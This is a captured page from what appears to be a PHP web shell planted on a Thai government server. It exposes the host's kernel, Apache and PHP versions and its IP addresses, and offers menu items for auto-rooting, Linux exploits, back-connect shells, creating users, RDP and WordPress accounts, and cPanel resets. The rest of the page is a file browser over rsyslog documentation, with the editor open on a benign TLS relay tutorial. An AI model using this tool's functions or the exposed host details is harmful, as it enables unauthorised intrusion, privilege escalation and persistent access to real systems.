Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
rsyslog-5.8.10 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
501
B
-rw-r--r--
COPYING
34.32
KB
-rw-r--r--
COPYING.ASL20
8.92
KB
-rw-r--r--
COPYING.LESSER
7.46
KB
-rw-r--r--
ChangeLog
339.47
KB
-rw-r--r--
NEWS
63
B
-rw-r--r--
README
249
B
-rw-r--r--
bugs.html
1.45
KB
-rw-r--r--
build_from_repo.html
4.35
KB
-rw-r--r--
contributors.html
2.44
KB
-rw-r--r--
debug.html
9.41
KB
-rw-r--r--
dev_queue.html
17.27
KB
-rw-r--r--
droppriv.html
2.9
KB
-rw-r--r--
expression.html
1.15
KB
-rw-r--r--
features.html
8.64
KB
-rw-r--r--
generic_design.html
8.8
KB
-rw-r--r--
gssapi.html
3.55
KB
-rw-r--r--
history.html
8.75
KB
-rw-r--r--
how2help.html
2.43
KB
-rw-r--r--
im3195.html
2.08
KB
-rw-r--r--
imfile.html
7.62
KB
-rw-r--r--
imgssapi.html
2.26
KB
-rw-r--r--
imklog.html
4.36
KB
-rw-r--r--
impstats.html
2.91
KB
-rw-r--r--
imptcp.html
4.14
KB
-rw-r--r--
imrelp.html
2.52
KB
-rw-r--r--
imsolaris.html
1.9
KB
-rw-r--r--
imtcp.html
6.15
KB
-rw-r--r--
imuxsock.html
9.45
KB
-rw-r--r--
index.html
1.62
KB
-rw-r--r--
install.html
10.97
KB
-rw-r--r--
ipv6.html
2.94
KB
-rw-r--r--
licensing.html
3.69
KB
-rw-r--r--
log_rotation_fix_size.html
2.74
KB
-rw-r--r--
manual.html
7.48
KB
-rw-r--r--
mmsnmptrapd.html
4.89
KB
-rw-r--r--
modules.html
5.98
KB
-rw-r--r--
multi_ruleset.html
13.65
KB
-rw-r--r--
netstream.html
1.36
KB
-rw-r--r--
ns_gtls.html
2.78
KB
-rw-r--r--
ns_ptcp.html
911
B
-rw-r--r--
omlibdbi.html
6.57
KB
-rw-r--r--
ommail.html
7.78
KB
-rw-r--r--
ommysql.html
3.95
KB
-rw-r--r--
omoracle.html
6.04
KB
-rw-r--r--
omrelp.html
2.37
KB
-rw-r--r--
omruleset.html
6.93
KB
-rw-r--r--
omsnmp.html
6.97
KB
-rw-r--r--
omstdout.html
1.9
KB
-rw-r--r--
omudpspoof.html
4.23
KB
-rw-r--r--
omuxsock.html
1.88
KB
-rw-r--r--
pmlastmsg.html
3.05
KB
-rw-r--r--
property_replacer.html
17.83
KB
-rw-r--r--
queues.html
27.85
KB
-rw-r--r--
queues_analogy.html
20.11
KB
-rw-r--r--
rainerscript.html
4.19
KB
-rw-r--r--
rsconf1_actionexeconlywhenprev...
2.54
KB
-rw-r--r--
rsconf1_actionresumeinterval.h...
1.47
KB
-rw-r--r--
rsconf1_allowedsender.html
3.6
KB
-rw-r--r--
rsconf1_controlcharacterescape...
1.37
KB
-rw-r--r--
rsconf1_debugprintcfsyslinehan...
989
B
-rw-r--r--
rsconf1_debugprintmodulelist.h...
950
B
-rw-r--r--
rsconf1_debugprinttemplatelist...
956
B
-rw-r--r--
rsconf1_dircreatemode.html
1.04
KB
-rw-r--r--
rsconf1_dirgroup.html
1.06
KB
-rw-r--r--
rsconf1_dirowner.html
1.05
KB
-rw-r--r--
rsconf1_dropmsgswithmaliciousd...
1.31
KB
-rw-r--r--
rsconf1_droptrailinglfonrecept...
1.24
KB
-rw-r--r--
rsconf1_dynafilecachesize.html
2.1
KB
-rw-r--r--
rsconf1_escape8bitcharsonrecei...
2.1
KB
-rw-r--r--
rsconf1_escapecontrolcharacter...
1.92
KB
-rw-r--r--
rsconf1_failonchownfailure.htm...
1.25
KB
-rw-r--r--
rsconf1_filecreatemode.html
2.03
KB
-rw-r--r--
rsconf1_filegroup.html
1.05
KB
-rw-r--r--
rsconf1_fileowner.html
1.05
KB
-rw-r--r--
rsconf1_generateconfiggraph.ht...
7.92
KB
-rw-r--r--
rsconf1_gssforwardservicename....
1.04
KB
-rw-r--r--
rsconf1_gsslistenservicename.h...
905
B
-rw-r--r--
rsconf1_gssmode.html
1.04
KB
-rw-r--r--
rsconf1_includeconfig.html
3.06
KB
-rw-r--r--
rsconf1_mainmsgqueuesize.html
2.15
KB
-rw-r--r--
rsconf1_markmessageperiod.html
1.33
KB
-rw-r--r--
rsconf1_moddir.html
1.2
KB
-rw-r--r--
rsconf1_modload.html
1.49
KB
-rw-r--r--
rsconf1_repeatedmsgreduction.h...
1.3
KB
-rw-r--r--
rsconf1_resetconfigvariables.h...
1.05
KB
-rw-r--r--
rsconf1_rulesetcreatemainqueue...
3.7
KB
-rw-r--r--
rsconf1_rulesetparser.html
5.77
KB
-rw-r--r--
rsconf1_umask.html
1.16
KB
-rw-r--r--
rscript_abnf.html
6.69
KB
-rw-r--r--
rsyslog_conf.html
4.19
KB
-rw-r--r--
rsyslog_conf_actions.html
18
KB
-rw-r--r--
rsyslog_conf_examples.html
7.7
KB
-rw-r--r--
rsyslog_conf_filter.html
14.08
KB
-rw-r--r--
rsyslog_conf_global.html
21.93
KB
-rw-r--r--
rsyslog_conf_modules.html
10.26
KB
-rw-r--r--
rsyslog_conf_nomatch.html
2.69
KB
-rw-r--r--
rsyslog_conf_output.html
4.06
KB
-rw-r--r--
rsyslog_conf_templates.html
10.99
KB
-rw-r--r--
rsyslog_high_database_rate.htm...
8.62
KB
-rw-r--r--
rsyslog_mysql.html
16.02
KB
-rw-r--r--
rsyslog_ng_comparison.html
16.53
KB
-rw-r--r--
rsyslog_packages.html
2.76
KB
-rw-r--r--
rsyslog_pgsql.html
19.75
KB
-rw-r--r--
rsyslog_php_syslog_ng.html
8.54
KB
-rw-r--r--
rsyslog_recording_pri.html
8.19
KB
-rw-r--r--
rsyslog_reliable_forwarding.ht...
8.46
KB
-rw-r--r--
rsyslog_secure_tls.html
7.33
KB
-rw-r--r--
rsyslog_stunnel.html
15.39
KB
-rw-r--r--
rsyslog_tls.html
15.52
KB
-rw-r--r--
syslog_parsing.html
14.03
KB
-rw-r--r--
syslog_protocol.html
12.64
KB
-rw-r--r--
tls_cert_ca.html
7.67
KB
-rw-r--r--
tls_cert_client.html
4.5
KB
-rw-r--r--
tls_cert_errmsgs.html
5.67
KB
-rw-r--r--
tls_cert_machine.html
8.61
KB
-rw-r--r--
tls_cert_scenario.html
3.03
KB
-rw-r--r--
tls_cert_server.html
6.61
KB
-rw-r--r--
tls_cert_summary.html
3.26
KB
-rw-r--r--
tls_cert_udp_relay.html
5.11
KB
-rw-r--r--
troubleshoot.html
11.08
KB
-rw-r--r--
v3compatibility.html
11.19
KB
-rw-r--r--
v4compatibility.html
6.2
KB
-rw-r--r--
v5compatibility.html
2.19
KB
-rw-r--r--
version_naming.html
8.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tls_cert_udp_relay.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><title>TLS-protected syslog: UDP relay setup</title> </head> <body> <h1>Encrypting Syslog Traffic with TLS (SSL)</h1> <p><small><i>Written by <a href="http://www.adiscon.com/en/people/rainer-gerhards.php">Rainer Gerhards</a> (2008-07-03)</i></small></p> <ul> <li><a href="rsyslog_secure_tls.html">Overview</a> <li><a href="tls_cert_scenario.html">Sample Scenario</a> <li><a href="tls_cert_ca.html">Setting up the CA</a> <li><a href="tls_cert_machine.html">Generating Machine Certificates</a> <li><a href="tls_cert_server.html">Setting up the Central Server</a> <li><a href="tls_cert_client.html">Setting up syslog Clients</a> <li><a href="tls_cert_udp_relay.html">Setting up the UDP syslog relay</a> <li><a href="tls_cert_summary.html">Wrapping it all up</a> </ul> <h3>Setting up the UDP syslog relay</h3> <p>In this step, we configure the UDP relay ada.example.net. As a reminder, that machine relays messages from a local router, which only supports UDP syslog, to the central syslog server. The router does not talk directly to it, because we would like to have TLS protection for its sensitve logs. If the router and the syslog relay are on a sufficiently secure private network, this setup can be considered reasonable secure. In any case, it is the best alternative among the possible configuration scenarios. <span style="float: left"> <script type="text/javascript"><!-- google_ad_client = "pub-3204610807458280"; /* rsyslog doc inline */ google_ad_slot = "5958614527"; google_ad_width = 125; google_ad_height = 125; //--> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script> </span> <p><center><img src="tls_cert_100.jpg"></center> <p>Steps to do: <ul> <li>make sure you have a functional CA (<a href="tls_cert_ca.html">Setting up the CA</a>) <li>generate a machine certificate for ada.example.net (follow instructions in <a href="tls_cert_machine.html">Generating Machine Certificates</a>) <li>make sure you copy over ca.pem, machine-key.pem ad machine-cert.pem to the client. Ensure that no user except root can access them (<b>even read permissions are really bad</b>). <li>configure the client so that it checks the server identity and sends messages only if the server identity is known. </ul> <p>These were essentially the same steps as for any <a href="tls_cert_client.html">TLS syslog client</a>. We now need to add the capability to forward the router logs: <ul> <li>make sure that the firewall rules permit message recpetion on UDP port 514 (if you use a non-standard port for UDP syslog, make sure that port number is permitted). <li>you may want to limit who can send syslog messages via UDP. A great place to do this is inside the firewall, but you can also do it in rsyslog.conf via an $AllowedSender directive. We have used one in the sample config below. Please be aware that this is a kind of weak authentication, but definitely better than nothing... <li>add the UDP input plugin to rsyslog's config and start a UDP listener <li>make sure that your forwarding-filter permits to forward messages received from the remote router to the server. In our sample scenario, we do not need to add anything special, because all messages are forwarded. This includes messages received from remote hosts. </ul> <p><b>At this point, please be reminded once again that your security needs may be quite different from what we assume in this tutorial. Evaluate your options based on your security needs.</b> <h3>Sample syslog.conf</h3> <p>Keep in mind that this rsyslog.conf sends messages via TCP, only. Also, we do not show any rules to write local files. Feel free to add them. <code><pre> # start a UDP listener for the remote router $ModLoad imudp # load UDP server plugin $AllowedSender UDP, 192.0.2.1 # permit only the router $UDPServerRun 514 # listen on default syslog UDP port 514 # make gtls driver the default $DefaultNetstreamDriver gtls # certificate files $DefaultNetstreamDriverCAFile /rsyslog/protected/ca.pem $DefaultNetstreamDriverCertFile /rsyslog/protected/machine-cert.pem $DefaultNetstreamDriverKeyFile /rsyslog/protected/machine-key.pem $ActionSendStreamDriverAuthMode x509/name $ActionSendStreamDriverPermittedPeer central.example.net $ActionSendStreamDriverMode 1 # run driver in TLS-only mode *.* @@central.example.net:10514 # forward everything to remote server </pre></code> <p><font color="red"><b>Be sure to safeguard at least the private key (machine-key.pem)!</b> If some third party obtains it, you security is broken!</font> <h2>Copyright</h2> <p>Copyright © 2008 <a href="http://www.adiscon.com/en/people/rainer-gerhards.php">Rainer Gerhards</a> and <a href="http://www.adiscon.com/en/">Adiscon</a>.</p> <p> Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts. A copy of the license can be viewed at <a href="http://www.gnu.org/copyleft/fdl.html">http://www.gnu.org/copyleft/fdl.html</a>.</p> </body></html>
Close
